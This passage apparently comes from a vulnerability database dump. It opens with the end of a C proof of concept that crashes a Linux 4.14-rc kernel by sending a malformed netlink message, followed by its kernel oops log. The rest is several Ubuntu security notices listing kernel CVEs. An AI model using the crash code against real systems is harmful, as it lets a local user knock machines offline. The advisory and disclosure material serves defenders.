\ndest_addr.nl_groups = 0; /* unicast */ \n \nnlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD)); \nmemset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD)); \nnlh->nlmsg_len = 0xac; \nnlh->nlmsg_pid = getpid(); \nnlh->nlmsg_flags = 0; \n \nstrcpy(NLMSG_DATA(nlh), \"ABCDEFGHabcdefghABCDEFGHabcdef \nghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab \ncdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\\x10\"); \n \niov.iov_base = (void *)nlh; \niov.iov_len = 0xc0; 
\nmsg.msg_name = (void *)&dest_addr; \nmsg.msg_namelen = sizeof(dest_addr); \nmsg.msg_iov = &iov; \nmsg.msg_iovlen = 1; \n \nprintf(\"Sending message to kernel\\n\"); \nsendmsg(sock_fd,&msg,0); \nprintf(\"Waiting for message from kernel\\n\"); \n \n/* Read message from kernel */ \nrecvmsg(sock_fd, &msg, 0); \nprintf(\"Received message payload: %s\\n\", (char *)NLMSG_DATA(nlh)); \nclose(sock_fd); \n} \n \n \nCrash info: \n[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at \n0000000000000028 \n[ 17.881586] IP: skb_release_data+0x77/0x110 \n[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0 \n[ 17.882743] Oops: 0002 [#1] SMP \n[ 17.883123] Modules linked in: \n[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1 \n[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS \nUbuntu-1.8.2-1ubuntu1 04/01/2014 \n[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000 \n[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110 \n[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202 \n[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX: \nffffffff820f96a0 \n[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI: \n000000000000000c \n[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09: \nffffc90000e13ad8 \n[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12: \n0000000000000000 \n[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15: \n0000000000000000 \n[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000) \nknlGS:0000000000000000 \n[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 \n[ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4: \n00000000000006e0 \n[ 17.892629] Call Trace: \n[ 17.892833] skb_release_all+0x1f/0x30 \n[ 17.893140] consume_skb+0x27/0x90 \n[ 17.893418] netlink_unicast+0x16a/0x210 \n[ 17.893735] netlink_sendmsg+0x2a3/0x390 \n[ 17.894050] sock_sendmsg+0x33/0x40 \n[ 17.894336] ___sys_sendmsg+0x29e/0x2b0 \n[ 17.894650] ? 
__wake_up_common_lock+0x7a/0x90 \n[ 17.895009] ? __wake_up+0xe/0x10 \n[ 17.895280] ? tty_write_unlock+0x2c/0x30 \n[ 17.895606] ? tty_ldisc_deref+0x11/0x20 \n[ 17.895925] ? n_tty_open+0xd0/0xd0 \n[ 17.896211] ? __vfs_write+0x23/0x130 \n[ 17.896512] __sys_sendmsg+0x40/0x70 \n[ 17.896805] ? __sys_sendmsg+0x40/0x70 \n[ 17.897133] SyS_sendmsg+0xd/0x20 \n[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94 \n[ 17.897783] RIP: 0033:0x7f7614886320 \n[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX: \n000000000000002e \n[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX: \n00007f7614886320 \n[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI: \n0000000000000003 \n[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09: \n0000000000000000 \n[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12: \n0000000000400b9e \n[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15: \n0000000000400b9e \n[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83 \nc0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa \n<f0> ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49 \n[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08 \n[ 17.903689] CR2: 0000000000000028 \n[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]--- \n \n \nReference: \n[1] https://patchwork.kernel.org/patch/9923803/ \n[2] https://github.com/google/syzkaller \n \n`\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/144476/linuxkernel414rc3-dos.txt"}], "ubuntu": [{"lastseen": "2020-07-02T11:34:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "description": "Anthony Perard discovered that the Xen virtual block 
driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nBo Zhang discovered that the netlink wireless configuration interface in \nthe Linux kernel did not properly validate attributes when handling certain \nrequests. A local attacker with the CAP_NET_ADMIN could use this to cause a \ndenial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux \nkernel in some situations did not properly prevent second level guests \nfrom reading and writing the hardware CR8 register. A local attacker \nin a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux kernel \ndid not properly restrict key reads on negatively instantiated keys. A \nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs interface \nfor the QLogic 24xx+ series SCSI driver in the Linux kernel. A local \nprivileged attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14051)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux \nkernel did not properly initialize a data structure returned to user space. \nA local attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2017-14156)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux \nkernel did not properly validate data structures. 
A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-14489)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not \nproperly initialize data returned to user space in some situations. A local \nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2017-14991)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem in \nthe Linux kernel did not properly handle attempts to set reserved bits in a \ntask's extended state (xstate) area. A local attacker could use this to \ncause a denial of service (system crash). (CVE-2017-15537)\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device \ndriver in the Linux kernel contained race conditions when fetching \nfrom the ring-buffer. A local attacker could use this to cause a \ndenial of service (infinite loop). (CVE-2017-9984, CVE-2017-9985)", "edition": 6, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3469-1", "href": "https://ubuntu.com/security/notices/USN-3469-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "description": "USN-3469-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nAnthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. 
(CVE-2017-10911)\n\nBo Zhang discovered that the netlink wireless configuration interface in \nthe Linux kernel did not properly validate attributes when handling certain \nrequests. A local attacker with the CAP_NET_ADMIN could use this to cause a \ndenial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux \nkernel in some situations did not properly prevent second level guests \nfrom reading and writing the hardware CR8 register. A local attacker \nin a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux kernel \ndid not properly restrict key reads on negatively instantiated keys. A \nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs interface \nfor the QLogic 24xx+ series SCSI driver in the Linux kernel. A local \nprivileged attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14051)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux \nkernel did not properly initialize a data structure returned to user space. \nA local attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2017-14156)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux \nkernel did not properly validate data structures. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-14489)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not \nproperly initialize data returned to user space in some situations. 
A local \nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2017-14991)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem in \nthe Linux kernel did not properly handle attempts to set reserved bits in a \ntask's extended state (xstate) area. A local attacker could use this to \ncause a denial of service (system crash). (CVE-2017-15537)\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device \ndriver in the Linux kernel contained race conditions when fetching \nfrom the ring-buffer. A local attacker could use this to cause a \ndenial of service (infinite loop). (CVE-2017-9984, CVE-2017-9985)", "edition": 5, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3469-2", "href": "https://ubuntu.com/security/notices/USN-3469-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:24:24", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16525", "CVE-2017-12188", "CVE-2017-14489", "CVE-2017-15265", "CVE-2017-15649", "CVE-2017-16527", "CVE-2017-15537", "CVE-2017-16526", "CVE-2017-16533", "CVE-2017-12192", "CVE-2017-14156", "CVE-2017-1000255", "CVE-2017-16529", "CVE-2017-12153", "CVE-2017-16531", "CVE-2017-16534", "CVE-2017-14954", "CVE-2017-12154", "CVE-2017-16530", "CVE-2017-12190"], "description": "It was discovered that the KVM subsystem in the Linux kernel did not \nproperly keep track of nested levels in guest page tables. A local attacker \nin a guest VM could use this to cause a denial of service (host OS crash) \nor possibly execute arbitrary code in the host OS. (CVE-2017-12188)\n\nIt was discovered that on the PowerPC architecture, the kernel did not \nproperly sanitize the signal stack when handling sigreturn(). A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. 
(CVE-2017-1000255)\n\nBo Zhang discovered that the netlink wireless configuration interface in \nthe Linux kernel did not properly validate attributes when handling certain \nrequests. A local attacker with the CAP_NET_ADMIN could use this to cause a \ndenial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux kernel in \nsome situations did not properly prevent second level guests from reading \nand writing the hardware CR8 register. A local attacker in a guest could \nuse this to cause a denial of service (system crash). (CVE-2017-12154)\n\nVitaly Mayatskikh discovered that the SCSI subsystem in the Linux kernel \ndid not properly track reference counts when merging buffers. A local \nattacker could use this to cause a denial of service (memory exhaustion). \n(CVE-2017-12190)\n\nIt was discovered that the key management subsystem in the Linux kernel did \nnot properly restrict key reads on negatively instantiated keys. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-12192)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux \nkernel did not properly initialize a data structure returned to user space. \nA local attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2017-14156)\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux \nkernel did not properly validate data structures. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-14489)\n\nAlexander Potapenko discovered an information leak in the waitid \nimplementation of the Linux kernel. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2017-14954)\n\nIt was discovered that a race condition existed in the ALSA subsystem of \nthe Linux kernel when creating and deleting a port via ioctl(). 
A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-15265)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem in \nthe Linux kernel did not properly handle attempts to set reserved bits in a \ntask's extended state (xstate) area. A local attacker could use this to \ncause a denial of service (system crash). (CVE-2017-15537)\n\nIt was discovered that a race condition existed in the packet fanout \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-15649)\n\nAndrey Konovalov discovered a use-after-free vulnerability in the USB \nserial console driver in the Linux kernel. A physically proximate attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-16525)\n\nAndrey Konovalov discovered that the Ultra Wide Band driver in the Linux \nkernel did not properly check for an error condition. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash) or possibly execute arbitrary code. (CVE-2017-16526)\n\nAndrey Konovalov discovered that the ALSA subsystem in the Linux kernel \ncontained a use-after-free vulnerability. A local attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-16527)\n\nAndrey Konovalov discovered that the ALSA subsystem in the Linux kernel did \nnot properly validate USB audio buffer descriptors. A physically proximate \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-16529)\n\nAndrey Konovalov discovered that the USB unattached storage driver in the \nLinux kernel contained an out-of-bounds error when handling alternative \nsettings. 
A physically proximate attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code. (CVE-2017-16530)\n\nAndrey Konovalov discovered that the USB subsystem in the Linux kernel did \nnot properly validate USB interface association descriptors. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16531)\n\nAndrey Konovalov discovered that the USB subsystem in the Linux kernel did \nnot properly validate USB HID descriptors. A physically proximate attacker \ncould use this to cause a denial of service (system crash). \n(CVE-2017-16533)\n\nAndrey Konovalov discovered that the USB subsystem in the Linux kernel did \nnot properly validate CDC metadata. A physically proximate attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16534)", "edition": 6, "modified": "2017-11-21T00:00:00", "published": "2017-11-21T00:00:00", "id": "USN-3487-1", "href": "https://ubuntu.com/security/notices/USN-3487-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:42:50", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-1000252", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663"], "description": "USN-3468-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.04. \nThis update provides the corresponding updates for the Linux Hardware \nEnablement (HWE) kernel from Ubuntu 17.04 for Ubuntu 16.04 LTS.\n\nIt was discovered that the KVM subsystem in the Linux kernel did not \nproperly bound guest IRQs. A local attacker in a guest VM could use this to \ncause a denial of service (host system crash). (CVE-2017-1000252)\n\nIt was discovered that the Flash-Friendly File System (f2fs) implementation \nin the Linux kernel did not properly validate superblock metadata. 
A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the POSIX \nmessage queue implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)", "edition": 6, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3468-2", "href": "https://ubuntu.com/security/notices/USN-3468-2", "title": "Linux kernel (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T01:35:46", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-1000252", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663"], "description": "It was discovered that the KVM subsystem in the Linux kernel did not \nproperly bound guest IRQs. A local attacker in a guest VM could use this to \ncause a denial of service (host system crash). (CVE-2017-1000252)\n\nIt was discovered that the Flash-Friendly File System (f2fs) implementation \nin the Linux kernel did not properly validate superblock metadata. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. 
(CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the POSIX \nmessage queue implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)", "edition": 7, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3468-1", "href": "https://ubuntu.com/security/notices/USN-3468-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:40:42", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-1000252", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663"], "description": "It was discovered that the KVM subsystem in the Linux kernel did not \nproperly bound guest IRQs. A local attacker in a guest VM could use this to \ncause a denial of service (host system crash). (CVE-2017-1000252)\n\nIt was discovered that the Flash-Friendly File System (f2fs) implementation \nin the Linux kernel did not properly validate superblock metadata. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. 
\nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the POSIX \nmessage queue implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)", "edition": 6, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3468-3", "href": "https://ubuntu.com/security/notices/USN-3468-3", "title": "Linux kernel (GCP) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:39:02", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-17450", "CVE-2017-16525", "CVE-2017-14489", "CVE-2017-15274", "CVE-2018-5333", "CVE-2017-7889", "CVE-2017-0861", "CVE-2018-5344", "CVE-2017-15115", "CVE-2017-14140", "CVE-2017-8824", "CVE-2017-12192", "CVE-2017-1000407", "CVE-2017-15102", "CVE-2017-14156", "CVE-2017-5669", "CVE-2017-12153", "CVE-2017-15868", "CVE-2017-7542", "CVE-2017-18017", "CVE-2017-12190", "CVE-2017-0750", "CVE-2017-17806"], "description": "USN-3583-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 ESM.\n\nIt was discovered that an out-of-bounds write vulnerability existed in the \nFlash-Friendly File System (f2fs) in the Linux kernel. An attacker could \nconstruct a malicious file system that, when mounted, could cause a denial \nof service (system crash) or possibly execute arbitrary code. 
\n(CVE-2017-0750)\n\nIt was discovered that a race condition leading to a use-after-free \nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel allowed \npassthrough of the diagnostic I/O port 0x80. An attacker in a guest VM \ncould use this to cause a denial of service (system crash) in the host OS. \n(CVE-2017-1000407)\n\nBo Zhang discovered that the netlink wireless configuration interface in \nthe Linux kernel did not properly validate attributes when handling certain \nrequests. A local attacker with the CAP_NET_ADMIN could use this to cause a \ndenial of service (system crash). (CVE-2017-12153)\n\nVitaly Mayatskikh discovered that the SCSI subsystem in the Linux kernel \ndid not properly track reference counts when merging buffers. A local \nattacker could use this to cause a denial of service (memory exhaustion). \n(CVE-2017-12190)\n\nIt was discovered that the key management subsystem in the Linux kernel did \nnot properly restrict key reads on negatively instantiated keys. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs interface \nfor the QLogic 24xx+ series SCSI driver in the Linux kernel. A local \nprivileged attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14051)\n\nOtto Ebeling discovered that the memory manager in the Linux kernel did not \nproperly check the effective UID in some situations. A local attacker could \nuse this to expose sensitive information. (CVE-2017-14140)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux \nkernel did not properly initialize a data structure returned to user space. 
\nA local attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2017-14156)\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux \nkernel did not properly validate data structures. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-14489)\n\nJames Patrick-Evans discovered a race condition in the LEGO USB Infrared \nTower driver in the Linux kernel. A physically proximate attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-15102)\n\nChunYu Wang discovered that a use-after-free vulnerability existed in the \nSCTP protocol implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-15115)\n\nIt was discovered that the key management subsystem in the Linux kernel did \nnot properly handle NULL payloads with non-zero length values. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-15274)\n\nIt was discovered that the Bluetooth Network Encapsulation Protocol (BNEP) \nimplementation in the Linux kernel did not validate the type of socket \npassed in the BNEPCONNADD ioctl(). A local attacker with the CAP_NET_ADMIN \nprivilege could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-15868)\n\nAndrey Konovalov discovered a use-after-free vulnerability in the USB \nserial console driver in the Linux kernel. A physically proximate attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-16525)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) \nmodule did not properly perform access control checks. A local attacker \ncould improperly modify the systemwide OS fingerprint list. 
\n(CVE-2017-17450)\n\nIt was discovered that the HMAC implementation did not validate the state \nof the underlying cryptographic hash algorithm. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-17806)\n\nDenys Fedoryshchenko discovered a use-after-free vulnerability in the \nnetfilter xt_TCPMSS filter of the Linux kernel. A remote attacker could use \nthis to cause a denial of service (system crash). (CVE-2017-18017)\n\nGareth Evans discovered that the shm IPC subsystem in the Linux kernel did \nnot properly restrict mapping page zero. A local privileged attacker could \nuse this to execute arbitrary code. (CVE-2017-5669)\n\nIt was discovered that an integer overflow vulnerability existed in the \nIPv6 implementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (infinite loop). (CVE-2017-7542)\n\nTommi Rantala and Brad Spengler discovered that the memory manager in the \nLinux kernel did not properly enforce the CONFIG_STRICT_DEVMEM protection \nmechanism. A local attacker with access to /dev/mem could use this to \nexpose sensitive information or possibly execute arbitrary code. \n(CVE-2017-7889)\n\nMohamed Ghannam discovered a use-after-free vulnerability in the DCCP \nprotocol implementation in the Linux kernel. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-8824)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable \nDatagram Sockets) protocol implementation of the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in loop block device \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. 
(CVE-2018-5344)", "edition": 6, "modified": "2018-02-23T00:00:00", "published": "2018-02-23T00:00:00", "id": "USN-3583-2", "href": "https://ubuntu.com/security/notices/USN-3583-2", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:33:36", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-5754", "CVE-2017-17450", "CVE-2017-16525", "CVE-2017-14489", "CVE-2017-15274", "CVE-2018-5333", "CVE-2017-7889", "CVE-2017-0861", "CVE-2018-5344", "CVE-2017-15115", "CVE-2017-14140", "CVE-2017-8824", "CVE-2017-12192", "CVE-2017-1000407", "CVE-2017-15102", "CVE-2017-14156", "CVE-2017-5669", "CVE-2017-12153", "CVE-2017-15868", "CVE-2017-7542", "CVE-2017-18017", "CVE-2017-12190", "CVE-2017-0750", "CVE-2017-17806"], "description": "It was discovered that an out-of-bounds write vulnerability existed in the \nFlash-Friendly File System (f2fs) in the Linux kernel. An attacker could \nconstruct a malicious file system that, when mounted, could cause a denial \nof service (system crash) or possibly execute arbitrary code. \n(CVE-2017-0750)\n\nIt was discovered that a race condition leading to a use-after-free \nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel allowed \npassthrough of the diagnostic I/O port 0x80. An attacker in a guest VM \ncould use this to cause a denial of service (system crash) in the host OS. \n(CVE-2017-1000407)\n\nBo Zhang discovered that the netlink wireless configuration interface in \nthe Linux kernel did not properly validate attributes when handling certain \nrequests. A local attacker with the CAP_NET_ADMIN could use this to cause a \ndenial of service (system crash). 
(CVE-2017-12153)\n\nVitaly Mayatskikh discovered that the SCSI subsystem in the Linux kernel \ndid not properly track reference counts when merging buffers. A local \nattacker could use this to cause a denial of service (memory exhaustion). \n(CVE-2017-12190)\n\nIt was discovered that the key management subsystem in the Linux kernel did \nnot properly restrict key reads on negatively instantiated keys. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs interface \nfor the QLogic 24xx+ series SCSI driver in the Linux kernel. A local \nprivileged attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14051)\n\nOtto Ebeling discovered that the memory manager in the Linux kernel did not \nproperly check the effective UID in some situations. A local attacker could \nuse this to expose sensitive information. (CVE-2017-14140)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux \nkernel did not properly initialize a data structure returned to user space. \nA local attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2017-14156)\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux \nkernel did not properly validate data structures. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-14489)\n\nJames Patrick-Evans discovered a race condition in the LEGO USB Infrared \nTower driver in the Linux kernel. A physically proximate attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-15102)\n\nChunYu Wang discovered that a use-after-free vulnerability existed in the \nSCTP protocol implementation in the Linux kernel. 
